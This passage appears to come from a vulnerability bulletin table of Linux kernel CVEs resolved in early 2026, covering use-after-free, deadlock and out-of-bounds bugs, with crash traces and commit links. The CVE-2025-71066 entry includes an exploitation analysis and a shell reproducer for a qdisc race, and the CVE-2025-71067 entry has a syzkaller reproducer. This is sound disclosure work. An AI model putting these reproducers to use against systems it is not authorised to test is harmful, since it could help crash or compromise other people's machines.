? srso_alias_return_thunk+0x5/0xfbef5 [ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0 Fix this by always checking and removing an ets class from the active list when changing it to strict. [1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663 | 2026-01-13 | not yet calculated | CVE-2025-68815 | https://git.kernel.org/stable/c/58fdce6bc005e964f1dbc3ca716f5fe0f68839a2 https://git.kernel.org/stable/c/02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87 https://git.kernel.org/stable/c/8067db5c95aab9461d23117679338cd8869831fa https://git.kernel.org/stable/c/2f125ebe47d6369e562f3cbd9b6227cff51eaf34 https://git.kernel.org/stable/c/cca2ed931b734fe48139bc6f020e47367346630f https://git.kernel.org/stable/c/43d9a530c8c094d137159784e7c951c65f11ec6c https://git.kernel.org/stable/c/b1e125ae425aba9b45252e933ca8df52a843ec70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fw_tracer, Validate format string parameters Add validation for format string parameters in the firmware tracer to prevent potential security vulnerabilities and crashes from malformed format strings received from firmware. The firmware tracer receives format strings from the device firmware and uses them to format trace messages. Without proper validation, bad firmware could provide format strings with invalid format specifiers (e.g., %s, %p, %n) that could lead to crashes, or other undefined behavior. Add mlx5_tracer_validate_params() to validate that all format specifiers in trace strings are limited to safe integer/hex formats (%x, %d, %i, %u, %llx, %lx, etc.). Reject strings containing other format types that could be used to access arbitrary memory or cause crashes. Invalid format strings are added to the trace output for visibility with "BAD_FORMAT: " prefix. | 2026-01-13 | not yet calculated | CVE-2025-68816 | https://git.kernel.org/stable/c/95624b731c490a4b849844269193a233d6d556a0 https://git.kernel.org/stable/c/768d559f466cdd72849110a7ecd76a21d52dcfe3 https://git.kernel.org/stable/c/38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d https://git.kernel.org/stable/c/8ac688c0e430dab19f6a9b70df94b1f635612c1a https://git.kernel.org/stable/c/45bd283b1d69e2c97cddcb9956f0e0261fc4efd7 https://git.kernel.org/stable/c/8c35c2448086870509ede43947845be0833251f0 https://git.kernel.org/stable/c/b35966042d20b14e2d83330049f77deec5229749 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency Under high concurrency, A tree-connection object (tcon) is freed on a disconnect path while another path still holds a reference and later executes *_put()/write on it. | 2026-01-13 | not yet calculated | CVE-2025-68817 | https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4 https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21 https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path" This reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9. The commit being reverted added code to __qla2x00_abort_all_cmds() to call sp->done() without holding a spinlock. But unlike the older code below it, this new code failed to check sp->cmd_type and just assumed TYPE_SRB, which results in a jump to an invalid pointer in target-mode with TYPE_TGT_CMD: qla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success 0000000009f7a79b qla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h. qla2xxx [0000:65:00.0]-d01e:8: -> fwdump no buffer qla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event 0x8002 occurred qla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery - ha=0000000058183fda. BUG: kernel NULL pointer dereference, address: 0000000000000000 PF: supervisor instruction fetch in kernel mode PF: error_code(0x0010) - not-present page PGD 0 P4D 0 Oops: 0010 [#1] SMP CPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1 Hardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023 RIP: 0010:0x0 Code: Unable to access opcode bytes at 0xffffffffffffffd6. RSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206 RAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000 RDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0 RBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045 R10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40 R13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400 FS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __die+0x4d/0x8b ? page_fault_oops+0x91/0x180 ? trace_buffer_unlock_commit_regs+0x38/0x1a0 ? exc_page_fault+0x391/0x5e0 ? asm_exc_page_fault+0x22/0x30 __qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst] qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst] qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst] qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst] qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst] kthread+0xa8/0xd0 </TASK> Then commit 4475afa2646d ("scsi: qla2xxx: Complete command early within lock") added the spinlock back, because not having the lock caused a race and a crash. But qla2x00_abort_srb() in the switch below already checks for qla2x00_chip_is_down() and handles it the same way, so the code above the switch is now redundant and still buggy in target-mode. Remove it. | 2026-01-13 | not yet calculated | CVE-2025-68818 | https://git.kernel.org/stable/c/b04b3733fff7e94566386b962e4795550fbdfd3d https://git.kernel.org/stable/c/50b097d92c99f718831b8b349722bc79f718ba1b https://git.kernel.org/stable/c/c5c37a821bd1708f26a9522b4a6f47b9f7a20003 https://git.kernel.org/stable/c/e9e601b7df58ba0c667baf30263331df2c02ffe1 https://git.kernel.org/stable/c/b10ebbfd59a535c8d22f4ede6e8389622ce98dc0 https://git.kernel.org/stable/c/1c728951bc769b795d377852eae1abddad88635d https://git.kernel.org/stable/c/b57fbc88715b6d18f379463f48a15b560b087ffe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg() rlen value is a user-controlled value, but dtv5100_i2c_msg() does not check the size of the rlen value. Therefore, if it is set to a value larger than sizeof(st->data), an out-of-bounds vuln occurs for st->data. Therefore, we need to add proper range checking to prevent this vuln. | 2026-01-13 | not yet calculated | CVE-2025-68819 | https://git.kernel.org/stable/c/c2c293ea7b61f12cdaad1e99a5b4efc58c88960a https://git.kernel.org/stable/c/c2305b4c5fc15e20ac06c35738e0578eb4323750 https://git.kernel.org/stable/c/61f214a878e96e2a8750bf96a98f78c658dba60c https://git.kernel.org/stable/c/4a54d8fcb093761e4c56eb211cf4e39bf8401fa1 https://git.kernel.org/stable/c/fe3e129ab49806aaaa3f22067ebc75c2dfbe4658 https://git.kernel.org/stable/c/ac92151ff2494130d9fc686055d6bbb9743a673e https://git.kernel.org/stable/c/b91e6aafe8d356086cc621bc03e35ba2299e4788 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: xattr: fix null pointer deref in ext4_raw_inode() If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED), iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all() lacks error checking, this will lead to a null pointer dereference in ext4_raw_inode(), called right after ext4_get_inode_loc(). Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-13 | not yet calculated | CVE-2025-68820 | https://git.kernel.org/stable/c/b72a3476f0c97d02f63a6e9fff127348d55436f6 https://git.kernel.org/stable/c/3d8d22e75f7edfa0b30ff27330fd6a1285d594c3 https://git.kernel.org/stable/c/190ad0f22ba49f1101182b80e3af50ca2ddfe72f https://git.kernel.org/stable/c/b5d942922182e82724b7152cb998f540132885ec https://git.kernel.org/stable/c/5b154e901fda2e98570b8f426a481f5740097dc2 https://git.kernel.org/stable/c/ce5f54c065a4a7cbb92787f4f140917112350142 https://git.kernel.org/stable/c/b97cb7d6a051aa6ebd57906df0e26e9e36c26d14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix readahead reclaim deadlock Commit e26ee4efbc79 ("fuse: allocate ff->release_args only if release is needed") skips allocating ff->release_args if the server does not implement open. However in doing so, fuse_prepare_release() now skips grabbing the reference on the inode, which makes it possible for an inode to be evicted from the dcache while there are inflight readahead requests. This causes a deadlock if the server triggers reclaim while servicing the readahead request and reclaim attempts to evict the inode of the file being read ahead. Since the folio is locked during readahead, when reclaim evicts the fuse inode and fuse_evict_inode() attempts to remove all folios associated with the inode from the page cache (truncate_inode_pages_range()), reclaim will block forever waiting for the lock since readahead cannot relinquish the lock because it is itself blocked in reclaim: >>> stack_trace(1504735) folio_wait_bit_common (mm/filemap.c:1308:4) folio_lock (./include/linux/pagemap.h:1052:3) truncate_inode_pages_range (mm/truncate.c:336:10) fuse_evict_inode (fs/fuse/inode.c:161:2) evict (fs/inode.c:704:3) dentry_unlink_inode (fs/dcache.c:412:3) __dentry_kill (fs/dcache.c:615:3) shrink_kill (fs/dcache.c:1060:12) shrink_dentry_list (fs/dcache.c:1087:3) prune_dcache_sb (fs/dcache.c:1168:2) super_cache_scan (fs/super.c:221:10) do_shrink_slab (mm/shrinker.c:435:9) shrink_slab (mm/shrinker.c:626:10) shrink_node (mm/vmscan.c:5951:2) shrink_zones (mm/vmscan.c:6195:3) do_try_to_free_pages (mm/vmscan.c:6257:3) do_swap_page (mm/memory.c:4136:11) handle_pte_fault (mm/memory.c:5562:10) handle_mm_fault (mm/memory.c:5870:9) do_user_addr_fault (arch/x86/mm/fault.c:1338:10) handle_page_fault (arch/x86/mm/fault.c:1481:3) exc_page_fault (arch/x86/mm/fault.c:1539:2) asm_exc_page_fault+0x22/0x27 Fix this deadlock by allocating ff->release_args and grabbing the reference on the inode when preparing the file for release even if the server does not implement open. The inode reference will be dropped when the last reference on the fuse file is dropped (see fuse_file_put() -> fuse_release_end()). | 2026-01-13 | not yet calculated | CVE-2025-68821 | https://git.kernel.org/stable/c/cbbf3f1bb9f834bb2acbb61ddca74363456e19cd https://git.kernel.org/stable/c/4703bc0e8cd3409acb1476a70cb5b7ff943cf39a https://git.kernel.org/stable/c/cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f https://git.kernel.org/stable/c/fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6 https://git.kernel.org/stable/c/e0d6de83a4cc22bbac72713f3a58121af36cc411 https://git.kernel.org/stable/c/bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: alps - fix use-after-free bugs caused by dev3_register_work The dev3_register_work delayed work item is initialized within alps_reconnect() and scheduled upon receipt of the first bare PS/2 packet from an external PS/2 device connected to the ALPS touchpad. During device detachment, the original implementation calls flush_workqueue() in psmouse_disconnect() to ensure completion of dev3_register_work. However, the flush_workqueue() in psmouse_disconnect() only blocks and waits for work items that were already queued to the workqueue prior to its invocation. Any work items submitted after flush_workqueue() is called are not included in the set of tasks that the flush operation awaits. This means that after flush_workqueue() has finished executing, the dev3_register_work could still be scheduled. Although the psmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(), the scheduling of dev3_register_work remains unaffected. The race condition can occur as follows: CPU 0 (cleanup path) | CPU 1 (delayed work) psmouse_disconnect() | psmouse_set_state() | flush_workqueue() | alps_report_bare_ps2_packet() alps_disconnect() | psmouse_queue_work() kfree(priv); // FREE | alps_register_bare_ps2_mouse() | priv = container_of(work...); // USE | priv->dev3 // USE Add disable_delayed_work_sync() in alps_disconnect() to ensure that dev3_register_work is properly canceled and prevented from executing after the alps_data structure has been deallocated. This bug is identified by static analysis. | 2026-01-13 | not yet calculated | CVE-2025-68822 | https://git.kernel.org/stable/c/ed8c61b89be0c45f029228b2913d5cf7b5cda1a7 https://git.kernel.org/stable/c/a9c115e017b2c633d25bdfe6709dda6fc36f08c2 https://git.kernel.org/stable/c/bf40644ef8c8a288742fa45580897ed0e0289474 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix deadlock when reading partition table When one process(such as udev) opens ublk block device (e.g., to read the partition table via bdev_open()), a deadlock[1] can occur: 1. bdev_open() grabs disk->open_mutex 2. The process issues read I/O to ublk backend to read partition table 3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request() runs bio->bi_end_io() callbacks 4. If this triggers fput() on file descriptor of ublk block device, the work may be deferred to current task's task work (see fput() implementation) 5. This eventually calls blkdev_release() from the same context 6. blkdev_release() tries to grab disk->open_mutex again 7. Deadlock: same task waiting for a mutex it already holds The fix is to run blk_update_request() and blk_mq_end_request() with bottom halves disabled. This forces blkdev_release() to run in kernel work-queue context instead of current task work context, and allows ublk server to make forward progress, and avoids the deadlock. [axboe: rewrite comment in ublk] | 2026-01-13 | not yet calculated | CVE-2025-68823 | https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7 https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: using the num_tqps in the vf driver to apply for resources Currently, hdev->htqp is allocated using hdev->num_tqps, and kinfo->tqp is allocated using kinfo->num_tqps. However, kinfo->num_tqps is set to min(new_tqps, hdev->num_tqps); Therefore, kinfo->num_tqps may be smaller than hdev->num_tqps, which causes some hdev->htqp[i] to remain uninitialized in hclgevf_knic_setup(). Thus, this patch allocates hdev->htqp and kinfo->tqp using hdev->num_tqps, ensuring that the lengths of hdev->htqp and kinfo->tqp are consistent and that all elements are properly initialized. | 2026-01-13 | not yet calculated | CVE-2025-71064 | https://git.kernel.org/stable/c/c149decd8c18ae6acdd7a6041d74507835cf26e6 https://git.kernel.org/stable/c/bcefdb288eedac96fd2f583298927e9c6c481489 https://git.kernel.org/stable/c/6cd8a2930df850f4600fe8c57d0662b376520281 https://git.kernel.org/stable/c/1956d47a03eb625951e9e070db39fe2590e27510 https://git.kernel.org/stable/c/429f946a7af3fbf08761d218746cd4afa80a7954 https://git.kernel.org/stable/c/62f28d79a6186a602a9d926a2dbb5b12b6867df7 https://git.kernel.org/stable/c/c2a16269742e176fccdd0ef9c016a233491a49ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid potential deadlock As Jiaming Zhang and syzbot reported, there is potential deadlock in f2fs as below: Chain exists of: &sbi->cp_rwsem --> fs_reclaim --> sb_internal#2 Possible unsafe locking scenario: CPU0 CPU1 ---- ---- rlock(sb_internal#2); lock(fs_reclaim); lock(sb_internal#2); rlock(&sbi->cp_rwsem); *** DEADLOCK *** 3 locks held by kswapd0/73: #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline] #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389 #1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline] #1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197 #2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890 stack backtrace: CPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043 check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175 check_prev_add kernel/locking/lockdep.c:3165 [inline] check_prevs_add kernel/locking/lockdep.c:3284 [inline] validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908 __lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237 lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868 down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537 f2fs_down_read fs/f2fs/f2fs.h:2278 [inline] f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline] f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791 f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867 f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925 f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897 evict+0x504/0x9c0 fs/inode.c:810 f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853 evict+0x504/0x9c0 fs/inode.c:810 dispose_list fs/inode.c:852 [inline] prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000 super_cache_scan+0x39b/0x4b0 fs/super.c:224 do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437 shrink_slab_memcg mm/shrinker.c:550 [inline] shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628 shrink_one+0x28a/0x7c0 mm/vmscan.c:4955 shrink_many mm/vmscan.c:5016 [inline] lru_gen_shrink_node mm/vmscan.c:5094 [inline] shrink_node+0x315d/0x3780 mm/vmscan.c:6081 kswapd_shrink_node mm/vmscan.c:6941 [inline] balance_pgdat mm/vmscan.c:7124 [inline] kswapd+0x147c/0x2800 mm/vmscan.c:7389 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> The root cause is deadlock among four locks as below: kswapd - fs_reclaim --- Lock A - shrink_one - evict - f2fs_evict_inode - sb_start_intwrite --- Lock B - iput - evict - f2fs_evict_inode - sb_start_intwrite --- Lock B - f2fs_truncate - f2fs_truncate_blocks - f2fs_do_truncate_blocks - f2fs_lock_op --- Lock C ioctl - f2fs_ioc_commit_atomic_write - f2fs_lock_op --- Lock C - __f2fs_commit_atomic_write - __replace_atomic_write_block - f2fs_get_dnode_of_data - __get_node_folio - f2fs_check_nid_range - f2fs_handle_error - f2fs_record_errors - f2fs_down_write --- Lock D open - do_open - do_truncate - security_inode_need_killpriv - f2fs_getxattr - lookup_all_xattrs - f2fs_handle_error - f2fs_record_errors - f2fs_down_write --- Lock D - f2fs_commit_super - read_mapping_folio - filemap_alloc_folio_noprof - prepare_alloc_pages - fs_reclaim_acquire --- Lock A In order to a ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71065 | https://git.kernel.org/stable/c/8bd6dff8b801abaa362272894bda795bf0cf1307 https://git.kernel.org/stable/c/6c3bab5c6261aa22c561ef56b7365959a90e7d91 https://git.kernel.org/stable/c/86a85a7b622e6e8dba69810257733ce5eab5ed55 https://git.kernel.org/stable/c/ca8b201f28547e28343a6f00a6e91fa8c09572fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change zdi-disclosures@trendmicro.com says: The vulnerability is a race condition between `ets_qdisc_dequeue` and `ets_qdisc_change`. It leads to UAF on `struct Qdisc` object. Attacker requires the capability to create new user and network namespace in order to trigger the bug. See my additional commentary at the end of the analysis. Analysis: static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt, struct netlink_ext_ack *extack) { ... // (1) this lock is preventing .change handler (`ets_qdisc_change`) //to race with .dequeue handler (`ets_qdisc_dequeue`) sch_tree_lock(sch); for (i = nbands; i < oldbands; i++) { if (i >= q->nstrict && q->classes[i].qdisc->q.qlen) list_del_init(&q->classes[i].alist); qdisc_purge_queue(q->classes[i].qdisc); } WRITE_ONCE(q->nbands, nbands); for (i = nstrict; i < q->nstrict; i++) { if (q->classes[i].qdisc->q.qlen) { // (2) the class is added to the q->active list_add_tail(&q->classes[i].alist, &q->active); q->classes[i].deficit = quanta[i]; } } WRITE_ONCE(q->nstrict, nstrict); memcpy(q->prio2band, priomap, sizeof(priomap)); for (i = 0; i < q->nbands; i++) WRITE_ONCE(q->classes[i].quantum, quanta[i]); for (i = oldbands; i < q->nbands; i++) { q->classes[i].qdisc = queues[i]; if (q->classes[i].qdisc != &noop_qdisc) qdisc_hash_add(q->classes[i].qdisc, true); } // (3) the qdisc is unlocked, now dequeue can be called in parallel // to the rest of .change handler sch_tree_unlock(sch); ets_offload_change(sch); for (i = q->nbands; i < oldbands; i++) { // (4) we're reducing the refcount for our class's qdisc and // freeing it qdisc_put(q->classes[i].qdisc); // (5) If we call .dequeue between (4) and (5), we will have // a strong UAF and we can control RIP q->classes[i].qdisc = NULL; WRITE_ONCE(q->classes[i].quantum, 0); q->classes[i].deficit = 0; gnet_stats_basic_sync_init(&q->classes[i].bstats); memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats)); } return 0; } Comment: This happens because some of the classes have their qdiscs assigned to NULL, but remain in the active list. This commit fixes this issue by always removing the class from the active list before deleting and freeing its associated qdisc Reproducer Steps (trimmed version of what was sent by zdi-disclosures@trendmicro.com) ``` DEV="${DEV:-lo}" ROOT_HANDLE="${ROOT_HANDLE:-1:}" BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2 PING_BYTES="${PING_BYTES:-48}" PING_COUNT="${PING_COUNT:-200000}" PING_DST="${PING_DST:-127.0.0.1}" SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}" SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}" SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}" cleanup() { tc qdisc del dev "$DEV" root 2>/dev/null } trap cleanup EXIT ip link set "$DEV" up tc qdisc del dev "$DEV" root 2>/dev/null || true tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2 tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \ tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT" tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2 tc -s qdisc ls dev $DEV ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \ >/dev/null 2>&1 & tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0 tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2 tc -s qdisc ls dev $DEV tc qdisc del dev "$DEV" parent ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71066 | https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3 https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9 https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0 https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39 https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs: set dummy blocksize to read boot_block when mounting When mounting, sb->s_blocksize is used to read the boot_block without being defined or validated. Set a dummy blocksize before attempting to read the boot_block. The issue can be triggered with the following syz reproducer: mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0) r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0) ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000) mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00', &(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0) syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0) Here, the ioctl sets the bdev block size to 16384. During mount, get_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)), but since block_size(bdev) > PAGE_SIZE, sb_set_blocksize() leaves sb->s_blocksize at zero. Later, ntfs_init_from_boot() attempts to read the boot_block while sb->s_blocksize is still zero, which triggers the bug. [almaz.alexandrovich@paragon-software.com: changed comment style, added return value handling] | 2026-01-13 | not yet calculated | CVE-2025-71067 | https://git.kernel.org/stable/c/44a38eb4f7876513db5a1bccde74de9bc4389d43 https://git.kernel.org/stable/c/4fff9a625da958a33191c8553a03283786f9f417 https://git.kernel.org/stable/c/b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a https://git.kernel.org/stable/c/d1693a7d5a38acf6424235a6070bcf5b186a360d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: svcrdma: bound check rq_pages index in inline path svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without verifying rc_curpage stays within the allocated page array. Add guards before the first use and after advancing to a new page. | 2026-01-13 | not yet calculated | CVE-2025-71068 | https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9 https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417 https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: invalidate dentry cache on failed whiteout creation F2FS can mount filesystems with corrupted directory depth values that get runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT operations are performed on such directories, f2fs_rename performs directory modifications (updating target entry and deleting source entry) before attempting to add the whiteout entry via f2fs_add_link. If f2fs_add_link fails due to the corrupted directory structure, the function returns an error to VFS, but the partial directory modifications have already been committed to disk. VFS assumes the entire rename operation failed and does not update the dentry cache, leaving stale mappings. In the error path, VFS does not call d_move() to update the dentry cache. This results in new_dentry still pointing to the old inode (new_inode) which has already had its i_nlink decremented to zero. The stale cache causes subsequent operations to incorrectly reference the freed inode. This causes subsequent operations to use cached dentry information that no longer matches the on-disk state. When a second rename targets the same entry, VFS attempts to decrement i_nlink on the stale inode, which may already have i_nlink=0, triggering a WARNING in drop_nlink(). Example sequence: 1. First rename (RENAME_WHITEOUT): file2 → file1 - f2fs updates file1 entry on disk (points to inode 8) - f2fs deletes file2 entry on disk - f2fs_add_link(whiteout) fails (corrupted directory) - Returns error to VFS - VFS does not call d_move() due to error - VFS cache still has: file1 → inode 7 (stale!) - inode 7 has i_nlink=0 (already decremented) 2. Second rename: file3 → file1 - VFS uses stale cache: file1 → inode 7 - Tries to drop_nlink on inode 7 (i_nlink already 0) - WARNING in drop_nlink() Fix this by explicitly invalidating old_dentry and new_dentry when f2fs_add_link fails during whiteout creation. This forces VFS to refresh from disk on subsequent operations, ensuring cache consistency even when the rename partially succeeds. Reproducer: 1. Mount F2FS image with corrupted i_current_depth 2. renameat2(file2, file1, RENAME_WHITEOUT) 3. renameat2(file3, file1, 0) 4. System triggers WARNING in drop_nlink() | 2026-01-13 | not yet calculated | CVE-2025-71069 | https://git.kernel.org/stable/c/7f2bae0c881aa1e0a6318756df692cc13df2cc83 https://git.kernel.org/stable/c/3d95ed8cf980fdfa67a3ab9491357521ae576168 https://git.kernel.org/stable/c/64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb https://git.kernel.org/stable/c/3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5 https://git.kernel.org/stable/c/c89845fae250efdd59c1d4ec60e9e1c652cee4b6 https://git.kernel.org/stable/c/0dde30753c1e8648665dbe069d814e540ce2fd37 https://git.kernel.org/stable/c/d33f89b34aa313f50f9a512d58dd288999f246b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: clean up user copy references on ublk server exit If a ublk server process releases a ublk char device file, any requests dispatched to the ublk server but not yet completed will retain a ref value of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 ("ublk: simplify aborting ublk request"), __ublk_fail_req() would decrement the reference count before completing the failed request. However, that commit optimized __ublk_fail_req() to call __ublk_complete_rq() directly without decrementing the request reference count. The leaked reference count incorrectly allows user copy and zero copy operations on the completed ublk request. It also triggers the WARN_ON_ONCE(refcount_read(&io->ref)) warnings in ublk_queue_reinit() and ublk_deinit_queue(). Commit c5c5eb24ed61 ("ublk: avoid ublk_io_release() called after ublk char dev is closed") already fixed the issue for ublk devices using UBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference count leak also affects UBLK_F_USER_COPY, the other reference-counted data copy mode. Fix the condition in ublk_check_and_reset_active_ref() to include all reference-counted data copy modes. This ensures that any ublk requests still owned by the ublk server when it exits have their reference counts reset to 0. | 2026-01-13 | not yet calculated | CVE-2025-71070 | https://git.kernel.org/stable/c/13456b4f1033d911f8bf3a0a1195656f293ba0f6 https://git.kernel.org/stable/c/daa24603d9f0808929514ee62ced30052ca7221c |
